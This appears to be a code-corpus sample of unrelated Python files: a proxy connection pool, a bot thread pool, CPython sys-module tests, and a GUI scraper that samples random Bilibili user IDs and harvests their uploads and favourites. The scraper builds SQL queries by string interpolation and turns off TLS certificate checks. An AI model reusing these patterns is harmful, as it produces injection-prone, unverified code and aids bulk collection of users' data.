sleep(1) # Add a second delay before the traffic light change to ensure the user has gotten the message
blink_green() # Change Traffic light to Green for 10 seconds
except KeyboardInterrupt:
pass
|
connect_manager.py | import os
import sys
import socket
import operator
import time
import threading
import struct
if __name__ == '__main__':
current_path = os.path.dirname(os.path.abspath(__file__))
root_path = os.path.abspath(os.path.join(current_path, os.pardir))
python_path = os.path.join(root_path, 'python27', '1.0')
noarch_lib = os.path.join(python_path, 'lib', 'noarch')
sys.path.append(noarch_lib)
from socket_wrap import SocketWrap
import simple_queue
import socks
import global_var as g
from xlog import getLogger
xlog = getLogger("smart_router")
def load_proxy_config():
global default_socket
if g.config.PROXY_ENABLE:
if g.config.PROXY_TYPE == "HTTP":
proxy_type = socks.HTTP
elif g.config.PROXY_TYPE == "SOCKS4":
proxy_type = socks.SOCKS4
elif g.config.PROXY_TYPE == "SOCKS5":
proxy_type = socks.SOCKS5
else:
xlog.error("proxy type %s unknown, disable proxy", g.config.PROXY_TYPE)
raise Exception()
socks.set_default_proxy(proxy_type, g.config.PROXY_HOST, g.config.PROXY_PORT,
g.config.PROXY_USER, g.config.PROXY_PASSWD)
class ConnectManager(object):
def __init__(self, connection_timeout=15, connect_threads=3, connect_timeout=5):
self.lock = threading.Lock()
self.cache = {}
# host => [ { "conn":.., "create_time" }
# ... ]
self.connection_timeout = connection_timeout
self.connect_timeout = connect_timeout
self.connect_threads = connect_threads
self.running = True
threading.Thread(target=self.check_thread).start()
def stop(self):
self.running = False
def check_thread(self):
while self.running:
time_now = time.time()
with self.lock:
for host_port in list(self.cache.keys()):
try:
cache = self.cache[host_port]
for cc in list(cache):
if time_now - cc["create_time"] > self.connection_timeout:
cache.remove(cc)
cc["conn"].close()
except:
pass
time.sleep(1)
def add_sock(self, host_port, sock):
with self.lock:
if host_port not in self.cache:
self.cache[host_port] = []
self.cache[host_port].append({"create_time": time.time(), "conn": sock})
def get_sock_from_cache(self, host_port):
time_now = time.time()
with self.lock:
if host_port in self.cache:
cache = self.cache[host_port]
while len(cache):
try:
cc = cache.pop(0)
if time_now - cc["create_time"] > self.connection_timeout:
cc["conn"].close()
continue
return cc["conn"]
except Exception as e:
xlog.exception("get_conn:%r", e)
break
def create_connect(self, queue, host, ip, port, timeout=5):
if int(g.config.PROXY_ENABLE):
sock = socks.socksocket(socket.AF_INET if ':' not in ip else socket.AF_INET6)
else:
sock = socket.socket(socket.AF_INET if ':' not in ip else socket.AF_INET6)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# set struct linger{l_onoff=1,l_linger=0} to avoid 10048 socket error
sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
# resize socket recv buffer 8K->32K to improve browser releated application performance
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 32 * 1024)
sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, True)
sock.settimeout(timeout)
start_time = time.time()
try:
sock.connect((ip, port))
time_cost = (time.time() - start_time) * 1000
# xlog.debug("connect %s %s:%d time:%d", host, ip, port, time_cost)
g.ip_cache.update_connect_time(ip, port, time_cost)
s = SocketWrap(sock, ip, port, host)
host_port = "%s:%d" % (host, port)
self.add_sock(host_port, s)
queue.put(True)
except Exception as e:
# xlog.debug("connect %s %s:%d fail:%r", host, ip, port, e)
g.ip_cache.report_connect_fail(ip, port)
queue.put(False)
def get_conn(self, host, ips, port, timeout=5):
# xlog.debug("connect to %s:%d %r", host, port, ips)
end_time = time.time() + timeout
host_port = "%s:%d" % (host, port)
sock = self.get_sock_from_cache(host_port)
if sock:
return sock
ip_rate = {}
for ipd in ips:
ipl = ipd.split("|")
ip = ipl[0]
connect_time = g.ip_cache.get_connect_time(ip, port)
if connect_time >= 8000:
continue
ip_rate[ip] = connect_time
if not ip_rate:
return None
ip_time = sorted(ip_rate.items(), key=operator.itemgetter(1))
ordered_ips = [ip for ip, rate in ip_time]
wait_queue = simple_queue.Queue()
wait_t = 0.2
for ip in ordered_ips:
threading.Thread(target=self.create_connect, args=(wait_queue, host, ip, port)).start()
status = wait_queue.get(wait_t)
if status:
sock = self.get_sock_from_cache(host_port)
if sock:
return sock
else:
time.sleep(wait_t)
wait_t += 0.1
while True:
time_left = end_time - time.time()
if time_left <= 0:
return self.get_sock_from_cache(host_port)
status = wait_queue.get(time_left)
if status:
sock = self.get_sock_from_cache(host_port)
if sock:
return sock |
threadpool.py | import asyncio
import logging
import threading
import time
from queue import Queue
from mmpy_bot.scheduler import default_scheduler
from mmpy_bot.webhook_server import WebHookServer
log = logging.getLogger("mmpy.threadpool")
class ThreadPool(object):
def __init__(self, num_workers: int):
"""Threadpool class to easily specify a number of worker threads and assign work
to any of them.
Arguments:
- num_workers: int, how many threads to run simultaneously.
"""
self.num_workers = num_workers
self.alive = False
self._queue = Queue()
self._busy_workers = Queue()
self._threads = []
def add_task(self, function, *args):
self._queue.put((function, args))
def get_busy_workers(self):
return self._busy_workers.qsize()
def start(self):
self.alive = True
# Spawn num_workers threads that will wait for work to be added to the queue
for _ in range(self.num_workers):
worker = threading.Thread(target=self.handle_work)
self._threads.append(worker)
worker.start()
def stop(self):
"""Signals all threads that they should stop and waits for them to finish."""
self.alive = False
# Signal every thread that it's time to stop
for _ in range(self.num_workers):
self._queue.put((self._stop_thread, tuple()))
# Wait for each of them to finish
log.info("Stopping threadpool, waiting for threads...")
for thread in self._threads:
thread.join()
log.info("Threadpool stopped.")
def _stop_thread(self):
"""Used to stop individual threads."""
return
def handle_work(self):
while self.alive:
# Wait for a new task (blocking)
function, arguments = self._queue.get()
# Notify the pool that we started working
self._busy_workers.put(1)
function(*arguments)
# Notify the pool that we finished working
self._queue.task_done()
self._busy_workers.get()
def start_scheduler_thread(self, trigger_period: float):
def run_pending():
log.info("Scheduler thread started.")
while self.alive:
time.sleep(trigger_period)
default_scheduler.run_pending()
log.info("Scheduler thread stopped.")
self.add_task(run_pending)
def start_webhook_server_thread(self, webhook_server: WebHookServer):
async def start_server():
log.info("Webhook server thread started.")
await webhook_server.start()
while self.alive:
# We just use this to keep the loop running in a non-blocking way
await asyncio.sleep(0.001)
await webhook_server.stop()
log.info("Webhook server thread stopped.")
self.add_task(asyncio.run, start_server())
|
clear.py | # -*- coding: utf-8 -*-
import PySimpleGUI as sg
import time
import asyncio
import sqlite3
import threading
import queue
import logging
import os
import json
import aiohttp
import random
import sys
import xlsxwriter #导入模块
g_all_num = 0
g_related_uid_list = []
delay = 0.8
g_total_num = 0
g_stop = False
threads = []
g_ranking_tags = []
def save_user(cursor,conn,uid,fav,owned,refav,reowned,t1,t2):
sql = f'insert into user( id,owned_num,fav_num,fav_related_num,owned_related_num,\
fav_related_bvids,owned_related_bvids,owned_bvids,fav_bvids,last_owned_time,last_fav_time) \
values ({uid},{len(owned)},{len(fav)},{len(refav)},{len(reowned)},\
\"{refav}\",\"{reowned}\",\"{owned}\",\"{fav}\",{t1},{t2})'
try:
cursor.execute(sql)
conn.commit()
except BaseException as e:
print(sql)
logging.error(e) # 错误
#单收藏夹视频
async def fetch_sigle_list_favs_bvids(session,mid,pn=1):
if g_stop:
return 0,[]
await asyncio.sleep(delay)
fav_uri = f"https://api.bilibili.com/x/v3/fav/resource/list?media_id={mid}&pn={pn}&ps=20&keyword=&order=mtime&type=0&tid=0&jsonp=jsonp"
bvids = []
async with session.get(fav_uri) as response:
try:
data = json.loads(await response.text())
if(data['code'] == 0 and data['data']['medias']):
videos = data['data']['medias']
for v in videos:
bvids.append(v['bvid'])
if pn*20>=data['data']['info']['media_count'] or pn > 20:
if pn == 1 :
return videos[0]['fav_time'],bvids
return bvids
res = await fetch_sigle_list_favs_bvids(session,mid,pn+1)
if pn == 1 :
return videos[0]['fav_time'],bvids + res
return bvids + res
except BaseException as e:
logging.error("uri:",fav_uri,e)
if pn == 1 :
return 0,[]
return []
if pn == 1 :
return 0,[]
return []
#收藏视频
async def fetch_favs_bvids(session,uid,maxt):
print('收藏视频')
if g_stop:
return 0,[]
await asyncio.sleep(delay)
uri = f"https://api.bilibili.com/x/v3/fav/folder/created/list?pn=1&ps=100&up_mid={uid}&jsonp=jsonp"
fav_list=[]
async with session.get(uri) as response:
try:
data = json.loads( await response.text())
if(data['code'] == 0 and data['data']):
for d in data['data']['list']:
fav_list.append(d['id'])
else:
return 0,[]
tasks_container = [fetch_sigle_list_favs_bvids(session,f) for f in fav_list]
#降速,防止有人变态的搞了几十个收藏夹
tasks = []
bvids = []
fav_times = []
for task in tasks_container:
tasks.append(task)
if(len(tasks)>=maxt):
results = await asyncio.gather(*tasks)
for t,bv in results:
fav_times.append(t)
bvids+=bv
tasks=[]
results = await asyncio.gather(*tasks)
for t,bv in results:
fav_times.append(t)
bvids+=bv
return max(fav_times),bvids
except BaseException as e:
logging.error("uri:",uri,e)
return 0,[]
#视频标签
async def fetch_video_by_bvid(session,bvid):
if g_stop:
return bvid,[]
print('视频标签')
uri = f"https://api.bilibili.com/x/tag/archive/tags?bvid={bvid}&jsonp=jsonp"
tags=[]
await asyncio.sleep(delay)
async with session.get(uri) as response:
try:
data = json.loads(await response.text())
if(data['code'] == 0):
for d in data['data']:
if '\'' not in d['tag_name'] and '\"' not in d['tag_name']:
tags.append(d['tag_name'])
else:
logging.error("uri:",uri,e)
except BaseException as e:
logging.error("uri:",uri,e)
return bvid,tags
#拥有视频
async def fetch_owned_bvids(session,uid,pn=1):
print('拥有视频')
await asyncio.sleep(delay)
uri = f"https://api.bilibili.com/x/space/arc/search?pn={pn}&ps=100&order=pubdate&keyword=&mid={uid}"
bvids = []
if g_stop:
return 0,[]
async with session.get(uri) as response:
try:
data = json.loads(await response.text())
if(data['code'] == 0 and data['data']['list']['vlist']):
videos = data['data']['list']['vlist']
for v in videos:
bvids.append(v['bvid'])
if(pn*100>=data['data']['page']['count'] or pn > 10):
if pn == 1 :
return videos[0]['created'],bvids
return bvids
res = await fetch_owned_bvids(session,uid,pn+1)
if pn == 1 :
return videos[0]['created'],bvids + res
return bvids + res
except BaseException as e:
logging.error("uri:",uri,e)
if pn == 1 :
return 0,[]
return []
if pn == 1 :
return 0,[]
return []
#所有视频
async def fetch_user_favs_and_bvids(uid,maxt,tags_need):
global g_related_uid_list
global g_all_num
global g_ranking_tags
print('所有视频')
try:
async with aiohttp.ClientSession(connector=aiohttp.TCPConnector(verify_ssl=False)) as session:
#获取最新发布时间和所有发布bv
res2 = await asyncio.gather(fetch_owned_bvids(session,uid))
last_owned_time,owned_bvids = res2[0]
# 获取最新收藏时间和所有收藏bv
res1 = await asyncio.gather(fetch_favs_bvids(session,uid,maxt))
last_fav_time,fav_bvids = res1[0]
if last_owned_time == 0 and last_fav_time == 0:
return
g_all_num +=1
#获取owned标签
tasks = []
owned_related = []
owned = []
try:
async with aiohttp.ClientSession(connector=aiohttp.TCPConnector(verify_ssl=False)) as session:
for bvid in owned_bvids:
tasks.append(fetch_video_by_bvid(session,bvid))
tagsList = []
if(len(tasks)>=maxt):
tagsList = await asyncio.gather(*tasks)
tasks = []
for bvid,tags in tagsList:
owned.append((bvid,tags))
for tn in tags_need:
if tn in tags:
owned_related.append((bvid,tags))
tagsList = await asyncio.gather(*tasks)
tasks = []
for bvid,tags in tagsList:
owned.append((bvid,tags))
for tn in tags_need:
if tn in tags:
owned_related.append((bvid,tags))
except BaseException as e:
logging.error("获取owned标签错误",e)
# # 获取fav标签
tasks = []
fav_related = []
fav = []
try:
async with aiohttp.ClientSession(connector=aiohttp.TCPConnector(verify_ssl=False)) as session:
for bvid in fav_bvids:
tasks.append(fetch_video_by_bvid(session,bvid))
tagsList = []
if(len(tasks)>=maxt):
tagsList = await asyncio.gather(*tasks)
tasks = []
for bvid,tags in tagsList:
fav.append((bvid,tags))
for tn in tags_need:
if tn in tags:
fav_related.append((bvid,tags))
tagsList = await asyncio.gather(*tasks)
tasks = []
for bvid,tags in tagsList:
fav.append((bvid,tags))
for tn in tags_need:
if tn in tags:
fav_related.append((bvid,tags))
except BaseException as e:
logging.error("获取fav标签错误",e)
if len(fav_related)>0 or len(owned_related)>0:
g_related_uid_list.append(uid)
conn = sqlite3.connect(os.path.dirname(__file__)+'/cache.db')
cursor = conn.cursor()
save_user(cursor,conn,uid,[x for x,y in fav],[x for x,y in owned],[x for x,y in fav_related],[x for x,y in owned_related],last_owned_time,last_fav_time)
print(len(fav),len(owned))
for x,y in fav:
g_ranking_tags+=y
cursor.execute(f'insert into video(bvid,tags) values (\"{x}\",\"{y}\")')
for x,y in owned:
g_ranking_tags+=y
cursor.execute(f'insert into video(bvid,tags) values (\"{x}\",\"{y}\")')
conn.commit()
except BaseException as e:
print(e)
#用户分离函数
async def user_go(utype,maxu,maxt,tags_need):
print('用户分离函数')
global g_total_num
while (g_all_num < maxu and utype==0) or (len(g_related_uid_list) < maxu and utype==1) :
tasks = []
uid_list = []
# if random.randint(1,10) < 7 :
# print('<<<<<<<<<')
# uid_list =random.sample(range(1,50_0000), 100)
# else:
uid_list =random.sample(range(1,4_0000_0000), 100)
# uid_list = [50911853]
for uid in uid_list:
if uid not in g_related_uid_list:
if (g_all_num >= maxu and utype==0) or (len(g_related_uid_list) >= maxu and utype==1) or g_stop:
return
tasks.append(fetch_user_favs_and_bvids(uid,maxt,tags_need))
g_total_num += 1
if(len(tasks)>=maxt):
await asyncio.gather(*tasks)
tasks=[]
await asyncio.gather(*tasks)
#用户信息业务主线程
def user_info_thread(maxt,maxu,utype,tags_need):
print('用户信息业务主线程')
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
a = asyncio.ensure_future(user_go(utype,maxu,maxt,tags_need))
loop.run_until_complete(a)
loop.close()
return
def main():
global g_stop
if(os.path.exists(os.path.dirname(__file__)+'/cache.db')):
os.remove(os.path.dirname(__file__)+'/cache.db')
try:
conn = sqlite3.connect(os.path.dirname(__file__)+'/cache.db')
cursor = conn.cursor()
cursor.execute('create table user (id integer primary key, owned_num integer, fav_num integer, \
fav_related_num integer, owned_related_num integer,fav_related_bvids text,owned_related_bvids text,\
owned_bvids text, fav_bvids text,last_owned_time integer,last_fav_time integer)')
cursor.execute('create table video (bvid text,tags text)')
except BaseException as e:
logging.warning(e) # 警告
conn.close()
sg.ChangeLookAndFeel('Topanga')
base_layout = [ [sg.OptionMenu(('活跃用户', '目标用户'),size=(7,1),key='utype'),sg.Input(size=(8,1),default_text=100,key='maxu')],
[sg.Text('线程:',size=(10,1)),sg.Input(size=(8,1),default_text=10,key='maxt')]]
tag_layout = [[sg.MLine(default_text='英雄联盟\nLOL',enable_events=True,key=('tags'),size=(44,5),tooltip='标签不支持单引号和双引号')]]
proxy_layout = [[sg.Text('没写',justification='center', size=(18,1))]
,[sg.Text(' ',justification='center', size=(18,1))]]
layout = [
[sg.Frame('基本设置', base_layout,key='bf'), sg.Frame('代理设置 (总数:0)', proxy_layout,key='pf')],
[sg.Frame('标签设置 (一行一个标签,当前共2个)', tag_layout,key='tt')],
[sg.Text('用户进度\t(0/100)\t0% 活跃用户数:0',size=(42,1),key='upbt')],
[sg.ProgressBar(100, orientation='h', size=(42, 20),key='upb')],
[sg.Button('<( ̄︶ ̄)↗[GO!]',key='go'),sg.Text('\t耗时:',size=(28,1),key='cost')]
]
w = sg.Window('BiliBili 爬虫',keep_on_top=True,alpha_channel=.9,disable_close=False).Layout(layout)
while True:
e, v = w.Read()
if e == None:
g_stop = True
break
elif e == 'go':
start = time.time()
w['go'].Update(disabled=True)
tags_need = [v for v in v['tags'].split('\n') if v]
utype = 0 if v['utype'] == '活跃用户' else 1
maxt = int(v['maxt'])
maxu = int(v['maxu'])
thread_user_info = threading.Thread(target=user_info_thread, args=(maxt,maxu,utype,tags_need,), daemon=True)
thread_user_info.start()
threads.append(thread_user_info)
while thread_user_info.is_alive():
progress = g_all_num if utype==0 else len(g_related_uid_list)
w['upbt'].Update(f'用户进度\t({progress}/{maxu})\t {round(progress*100/maxu)}% 活跃用户数:{g_all_num}')
w['upb'].UpdateBar(progress,maxu)
w['cost'].Update('总数:{}\t耗时:{}秒'.format(g_total_num,round(time.time()-start)))
time.sleep(0.5)
progress = g_all_num if utype==0 else len(g_related_uid_list)
w['upbt'].Update(f'用户进度\t({progress}/{maxu})\t {round(progress*100/maxu)}% 活跃用户数:{g_all_num}')
w['upb'].UpdateBar(progress,maxu)
w['cost'].Update('总数:{}\t耗时:{}秒'.format(g_total_num,round(time.time()-start)))
time.sleep(0.5)
w['go'].Update('导出数据中.....')
time.sleep(0.5)
db2_xls_main_go()
w['go'].Update('<( ̄︶ ̄)↗[GO!]')
w['go'].Update(disabled=False)
elif e=='tags':
tags_need = [v for v in v['tags'].split('\n') if v]
w['tt'].Update('标签设置 (一行一个标签,当前共{}个)'.format(len(tags_need)))
w.close()
def sqlite_get_col_names(cur, table):
query = 'select * from %s' % table
cur.execute(query)
return [tuple[0] for tuple in cur.description]
def sqlite_query(cur, table, col = '*', where = ''):
if where != '':
query = 'select %s from %s where %s' % (col, table, where)
else:
query = 'select %s from %s ' % (col, table)
cur.execute(query)
return cur.fetchall()
def sqlite_to_workbook(cur, table, workbook):
ws = workbook.add_worksheet(table)
print ('create table %s.' % table)
if table =='related_user':
ws.set_column('A:A', 10)
ws.set_column('B:C', 14)
ws.set_column('D:E', 18)
ws.set_column('F:G', 12)
ws.set_column('H:I', 18)
ws.set_column('J:K', 20)
bold = workbook.add_format({'bold': True})
ws.set_row(0, 20, bold)
elif table =='related_videos':
ws.set_column('A:A', 18)
bold = workbook.add_format({'bold': True})
ws.set_row(0, 20, bold)
ws.set_column('B:B', 150)
for colx, heading in enumerate(sqlite_get_col_names(cur, table)):
if heading=='id':
ws.write(0,colx, '用户ID')
elif heading =='owned_related_num':
ws.write(0,colx, '发布相关视频数')
elif heading =='fav_related_num':
ws.write(0,colx, '收藏相关视频数')
elif heading =='owned_related_bvids':
ws.write(0,colx, '发布相关视频的BV号')
elif heading =='fav_related_bvids':
ws.write(0,colx, '收藏相关视频的BV号')
elif heading =='owned_num':
ws.write(0,colx, '发布视频总数')
elif heading =='fav_num':
ws.write(0,colx, '收藏视频总数')
elif heading =='owned_bvids':
ws.write(0,colx, '所有发布视频的BV号')
elif heading =='fav_bvids':
ws.write(0,colx, '所有收藏视频的BV号')
elif heading =='last_owned_time':
ws.write(0,colx, '最近发布视频时间')
elif heading =='last_fav_time':
ws.write(0,colx, '最近收藏视频时间')
elif heading =='bvid':
ws.write(0,colx, '视频BV号')
elif heading =='tags':
ws.write(0,colx, '视频标签')
else:
ws.write(0,colx, heading)
for rowy,row in enumerate(sqlite_query(cur, table)):
for colx, text in enumerate(row):
if colx==9 or colx==10:
timeStamp = text
timeArray = time.localtime(timeStamp)
otherStyleTime = time.strftime("%Y-%m-%d %H:%M:%S", timeArray)
ws.write(rowy+ 1, colx, otherStyleTime)
else:
ws.write(rowy+ 1, colx, text)
def db2_xls_main(dbpath):
xlspath = dbpath[0:dbpath.rfind('.')] + '.xls'
print ("<%s> --> <%s>"% (dbpath, xlspath))
db = sqlite3.connect(dbpath)
cur = db.cursor()
workbook = xlsxwriter.Workbook(xlspath) #新建excel表
for tbl_name in [row[0] for row in sqlite_query(cur, 'sqlite_master', 'tbl_name', 'type = \'table\'')]:
sqlite_to_workbook(cur,tbl_name, workbook)
cur.close()
db.close()
workbook.close()
def db2_xls_main_go():
# arg == database path
log_path =os.path.dirname(__file__)+ '/cache.db'
# main(sys.argv[1])
db2_xls_main(log_path)
main() |
test_sys.py | # -*- coding: iso-8859-1 -*-
import unittest, test.support
import sys, io, os
import struct
import subprocess
import textwrap
# count the number of test runs, used to create unique
# strings to intern in test_intern()
numruns = 0
class SysModuleTest(unittest.TestCase):
def setUp(self):
self.orig_stdout = sys.stdout
self.orig_stderr = sys.stderr
self.orig_displayhook = sys.displayhook
def tearDown(self):
sys.stdout = self.orig_stdout
sys.stderr = self.orig_stderr
sys.displayhook = self.orig_displayhook
def test_original_displayhook(self):
import builtins
out = io.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(builtins, "_"):
del builtins._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
def test_lost_displayhook(self):
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
def test_original_excepthook(self):
err = io.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError as exc:
eh(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exit(self):
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
try:
sys.exit(0)
except SystemExit as exc:
self.assertEqual(exc.code, 0)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with one entry
# entry will be unpacked
try:
sys.exit(42)
except SystemExit as exc:
self.assertEqual(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with integer argument
try:
sys.exit((42,))
except SystemExit as exc:
self.assertEqual(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with string argument
try:
sys.exit("exit")
except SystemExit as exc:
self.assertEqual(exc.code, "exit")
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with two entries
try:
sys.exit((17, 23))
except SystemExit as exc:
self.assertEqual(exc.code, (17, 23))
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# test that the exit machinery handles SystemExits properly
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit(47)"])
self.assertEqual(rc, 47)
def check_exit_message(code, expected):
process = subprocess.Popen([sys.executable, "-c", code],
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
self.assertEqual(process.returncode, 1)
self.assertTrue(stderr.startswith(expected),
"%s doesn't start with %s" % (ascii(stderr), ascii(expected)))
# test that stderr buffer if flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertTrue(isinstance(sys.getdefaultencoding(), str))
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
# NOTE: this test is slightly fragile in that it depends on the current
# recursion count when executing the test being low enough so as to
# trigger the recursion recovery detection in the _Py_MakeEndRecCheck
# macro (see ceval.h).
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for i in (50, 1000):
# Issue #5392: stack overflow after hitting recursion limit twice
sys.setrecursionlimit(i)
self.assertRaises(RuntimeError, f)
self.assertRaises(RuntimeError, f)
finally:
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_fatalerror(self):
# A fatal error occurs if a second recursion limit is hit when recovering
# from a first one.
if os.name == "nt":
raise unittest.SkipTest(
"under Windows, test would generate a spurious crash dialog")
code = textwrap.dedent("""
import sys
def f():
try:
f()
except RuntimeError:
f()
sys.setrecursionlimit(%d)
f()""")
for i in (50, 1000):
sub = subprocess.Popen([sys.executable, '-c', code % i],
stderr=subprocess.PIPE)
err = sub.communicate()[1]
self.assertTrue(sub.returncode, sub.returncode)
self.assertTrue(
b"Fatal Python error: Cannot recover from stack overflow" in err,
err)
def test_getwindowsversion(self):
if hasattr(sys, "getwindowsversion"):
v = sys.getwindowsversion()
self.assertTrue(isinstance(v, tuple))
self.assertEqual(len(v), 5)
self.assertTrue(isinstance(v[0], int))
self.assertTrue(isinstance(v[1], int))
self.assertTrue(isinstance(v[2], int))
self.assertTrue(isinstance(v[3], int))
self.assertTrue(isinstance(v[4], str))
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
def test_dlopenflags(self):
if hasattr(sys, "setdlopenflags"):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertTrue(isinstance(sys.gettotalrefcount(), int))
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import _thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
def current_frames_with_threads(self):
import threading, _thread
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(_thread.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = _thread.get_ident()
self.assertTrue(main_id in d)
self.assertTrue(thread_id in d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertTrue(sourceline in ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assertTrue(0 in d)
self.assertTrue(d[0] is sys._getframe())
def test_attributes(self):
self.assertTrue(isinstance(sys.api_version, int))
self.assertTrue(isinstance(sys.argv, list))
self.assertTrue(sys.byteorder in ("little", "big"))
self.assertTrue(isinstance(sys.builtin_module_names, tuple))
self.assertTrue(isinstance(sys.copyright, str))
self.assertTrue(isinstance(sys.exec_prefix, str))
self.assertTrue(isinstance(sys.executable, str))
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertTrue(isinstance(sys.hexversion, int))
self.assertTrue(isinstance(sys.maxsize, int))
self.assertTrue(isinstance(sys.maxunicode, int))
self.assertTrue(isinstance(sys.platform, str))
self.assertTrue(isinstance(sys.prefix, str))
self.assertTrue(isinstance(sys.version, str))
vi = sys.version_info
self.assertTrue(isinstance(vi[:], tuple))
self.assertEqual(len(vi), 5)
self.assertTrue(isinstance(vi[0], int))
self.assertTrue(isinstance(vi[1], int))
self.assertTrue(isinstance(vi[2], int))
self.assertTrue(vi[3] in ("alpha", "beta", "candidate", "final"))
self.assertTrue(isinstance(vi[4], int))
self.assertTrue(isinstance(vi.major, int))
self.assertTrue(isinstance(vi.minor, int))
self.assertTrue(isinstance(vi.micro, int))
self.assertTrue(vi.releaselevel in
("alpha", "beta", "candidate", "final"))
self.assertTrue(isinstance(vi.serial, int))
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
